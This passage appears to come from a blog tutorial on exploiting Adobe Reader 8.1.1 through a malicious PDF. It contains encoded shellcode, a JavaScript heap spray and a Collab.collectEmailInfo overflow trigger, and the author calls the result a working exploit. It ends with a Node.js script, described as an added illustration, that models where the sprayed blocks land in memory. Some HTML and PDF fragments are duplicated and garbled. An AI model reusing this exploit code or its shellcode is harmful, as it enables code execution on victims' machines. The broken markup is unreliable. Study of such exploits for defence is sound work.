a9a8%ufd08%u1cbf%u144a%u340c%u322c%u2de1%ub296%uba67%u497
6%uf502%u25be%u4b40%ue280%u9943%u7bb3%ue030%ub027%ub4b8%u7691%u7015%u7942%ud638%u3974%u35eb%ue288%u7c24%ud412%ud287%u0de3%u3d77%u908d%u1b71%u7ef9%uf528%u9966%u3c73%u922c%u2a72%u0df9%u4a4f%ud523%u187f%u7afd%u0935%u2fe1%ubb47%u48be%ub2b6%u7d91%u7805%ud413%ub8b0%u1475%u438d%u9634%u044b%u970c%u8cb9%u25d6%u1d90%u931c%u27ba%ub3bf%ua846%u24a9%uc041%u40f8%u153d%u4e42%ub49f%ub5b7%ufc3f%u492d%ub167%u9b98%uda37%ubace%ufdc9%u156d%u74d9%uf424%u2b58%ub1c9%u3133%u1750%u5003%u8317%uf909%ue08f%uea75%u0bd9%ueb85%u82b9%uda60%uf1eb%u4fe1%u713c%u63a7%ud7b7%uf753%uffb5%ub054%u2670%u415b%ue6b5%u8137%u9ad7%ud645%ua237%u2b86%ue339%uc4fa%ubc6b%u7671%uc99c%u4bc7%u1d9d%uf34c%u18e5%u8092%u225f%u39c2%u6ceb%u32fa%u4cb3%u97fb%ub1a7%u9cb2%u411c%u7545%uaa6d%ub974%u9522%u34b9%ud13a%ua77d%u2949%u5a7e%uea4a%u80fd%uefdf%u43a5%ud447%u8754%u9f1e%u6c5a%uc754%u737e%u73b9%uf87a%u543c%uba0b%u701a%u1850%u2102%ucf3c%u313b%ub098%u3999%ua40a%u6398%u3b40%u1e28%u3b2d%u2132%u541d%uaa03%u23f2%u799c%udcb7%u20d6%u7491%ub0bf%u18a0%u6f40%u24e6%u9ac3%ud296%ueedb%u9f93%u025b%ub0e9%u2409%ub05e%u471b%u2201%ua6c7%uc2a4%ub762</span>");<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><span style="color: #0000ff">var</span> SprayValue = <span style="color: #0000ff">unescape</span>("<span style="color: #8b0000">%u9090%u9090</span>");<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><span style="color: #0000ff">do</span>{SprayValue +=SprayValue}<span style="color: #0000ff">while</span>(SprayValue.<span style="color: #0000ff">length</span> < 800000/2);<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: 
#fbfbfb"><span style="color: #0000ff">for</span>(j=0;j<200;j++) <span style="color: #0000ff">Array</span>2[j]=SprayValue+Shellcode;<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">}<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">HeapSpray();<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"><span style="color: #0000ff">var</span> crsh = <span style="color: #0000ff">unescape</span>("<span style="color: #8b0000">%u0a0a%u0a0a</span>");<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><span style="color: #0000ff">while</span> (crsh.<span style="color: #0000ff">length</span> < 0x4000)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> crsh += crsh;<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><span style="color: #0000ff">if</span> (app.viewerVersion >= 6.0)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> {<br /></pre><pre style="font-size: 12px; margin: 0em; 
width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> <span style="color: #0000ff">this</span>.collabStore = Collab.collectEmailInfo({subj: "<span style="color: #8b0000"></span>",msg: crsh});<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> }<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">endobj<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">xref<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">0 8<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0000000000 65535 f<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">0000000012 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0000000109 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; 
font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">0000000165 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0000000234 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">0000000439 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">0000000553 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">0000000677 00000 n<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">trailer<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"><<<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> /Size 8<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> /Root 1 0 R<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">>><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">startxref<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">784<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: 
%%EOF<br /></pre>">
#ffffff">%%EOF<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre></pre><br /><p>And the calc pops up.</p><br /><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqR3OyVVo1uovMfjB6b6g42jiflLBEpsZjIHCSGPeIpu153XEnfiJ3CC4U7jmDLHIid_hMZZqQGbjux0101ZsvBa6HQ1sSMRUTJ8ATe9WL7GXGsN4VLIRn9wTiKSS4Tah-D9mQosC7bUax/s1600-h/image%25255B16%25255D.png"><img title="image" style="border-right: 0px; border-top: 0px; display: inline; border-left: 0px; border-bottom: 0px" height="337" alt="image" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDUlyoMueIxO4d7AVWR1JLRRpznsPRNTMx-1iprCi6ZUfpARoqDk_ywIvZDAvzXyidDnlXkeLsxVYt9rKbRtSYvADjc5RzagK27Q9t95dXlMf18OQOkIwdid9jxglL5p714I1XLLpV0M7x//?imgmax=800" width="515" border="0"></a></p><br /><p>So here is our working exploit.</p><br /><p>Thanks to my friend Amit Malik, who helped me make the exploit reliable.</p><br /><p>Tested on Windows XP SP2 with Adobe Reader 8.1.1.</p><br /><p>References: <a title="http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html" href="http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html">http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html</a></p><p>abhijit mohanta, <a href="http://www.blogger.com/profile/07873328015433467380">http://www.blogger.com/profile/07873328015433467380</a></p>
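%%EOF<br /></pre>">
<p>As an added illustration (not code from the original post), the Node.js script below models the spray that the post's <code>HeapSpray()</code> produces so that the choice of <code>0x0a0a0a0a</code> can be checked rather than taken on faith. It decodes <code>unescape()</code>-style <code>%uXXXX</code> strings to the UTF-16LE bytes they occupy in a 32-bit process, reproduces the doubling loop to get the NOP-sled size of each block (524288 chars, 1 MiB of <code>0x90</code>), lays the 200 blocks out from an assumed heap base, and reports whether the address supplied by <code>crsh</code> lands inside a sled, inside the shellcode tail, or outside the spray. The heap base <code>0x02000000</code>, the contiguous block layout and the placeholder shellcode bytes are assumptions made for the model, not values from the post or from Adobe Reader.</p>

```javascript
// Added example, not part of the original post. Models the heap spray layout
// built by the PDF's JavaScript and checks where a chosen return address lands.
// Assumptions (not from the page): JS strings live in memory as UTF-16LE on a
// 32-bit x86 process, sprayed blocks are allocated contiguously from an
// assumed heap base, and the shellcode bytes below are a constructed placeholder.

// Decode an unescape()-style string to the bytes it occupies as UTF-16LE:
// "%u9090" -> [0x90, 0x90]; "%u0a0a" -> [0x0a, 0x0a]; plain chars -> [code, 0].
function unescapeToBytes(s) {
  const bytes = [];
  const re = /%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})|([\s\S])/g;
  let m;
  while ((m = re.exec(s)) !== null) {
    let code;
    if (m[1] !== undefined) code = parseInt(m[1], 16);
    else if (m[2] !== undefined) code = parseInt(m[2], 16);
    else code = m[3].charCodeAt(0);
    bytes.push(code & 0xff, code >>> 8);   // little-endian 16-bit unit
  }
  return bytes;
}

// Reproduce the post's loop: SprayValue starts as two UTF-16 chars ("%u9090%u9090")
// and doubles until it is at least 800000/2 chars long.
function sprayChunkChars(start = 2, limit = 800000 / 2) {
  let len = start;
  do { len *= 2; } while (len < limit);
  return len;                       // 524288 chars = 1 MiB of NOP bytes per block
}

// Lay out `count` blocks of (NOP sled + shellcode) back to back from `base`.
function sprayLayout({ base, count, sledBytes, shellcodeBytes }) {
  const blocks = [];
  let addr = base;
  for (let i = 0; i < count; i++) {
    blocks.push({ index: i, start: addr, sledEnd: addr + sledBytes,
                  end: addr + sledBytes + shellcodeBytes });
    addr += sledBytes + shellcodeBytes;
  }
  return blocks;
}

// Classify a candidate EIP value: anywhere in a sled slides into the shellcode;
// inside the shellcode itself (likely mid-instruction) or outside the spray is unreliable.
function classify(addr, blocks) {
  for (const b of blocks) {
    if (addr >= b.start && addr < b.sledEnd) {
      return { where: 'sled', block: b.index, slide: b.sledEnd - addr };
    }
    if (addr >= b.sledEnd && addr < b.end) return { where: 'shellcode', block: b.index };
  }
  return { where: 'unsprayed' };
}

// The 32-bit value a pointer read from the overwritten buffer would hold:
// crsh = unescape("%u0a0a%u0a0a") -> bytes 0a 0a 0a 0a -> 0x0a0a0a0a.
function pointerFromUnescaped(s) {
  const b = unescapeToBytes(s);
  return ((b[3] << 24) | (b[2] << 16) | (b[1] << 8) | b[0]) >>> 0;
}

function demo() {
  const sledBytes = sprayChunkChars() * 2;                 // 1048576 bytes of 0x90
  const shellcode = unescapeToBytes('%u9090%u9090%ucccc'); // constructed placeholder payload
  const blocks = sprayLayout({
    base: 0x02000000,          // hypothetical heap base, an assumption of this model
    count: 200,                // the post's for(j=0;j<200;j++) loop
    sledBytes,
    shellcodeBytes: shellcode.length,
  });
  const target = pointerFromUnescaped('%u0a0a%u0a0a');
  return {
    target,
    sledBytes,
    blocks: blocks.length,
    hit: classify(target, blocks),          // lands in a sled -> reliable
    miss: classify(0x7ffe0000, blocks),     // far above the spray -> unreliable
  };
}

console.log(demo());
```

<p>Run it with <code>node spray_model.js</code>. Under the stated assumptions the target falls roughly 640 KB into the sled of block 128 and slides into the shellcode, which is the property the large sled-to-shellcode ratio buys: the exact heap base only has to be close enough that <code>0x0a0a0a0a</code> is covered by some block, not by a particular one. An address that lands in the <code>shellcode</code> region or outside the spray is the case the spray was sized to avoid.</p>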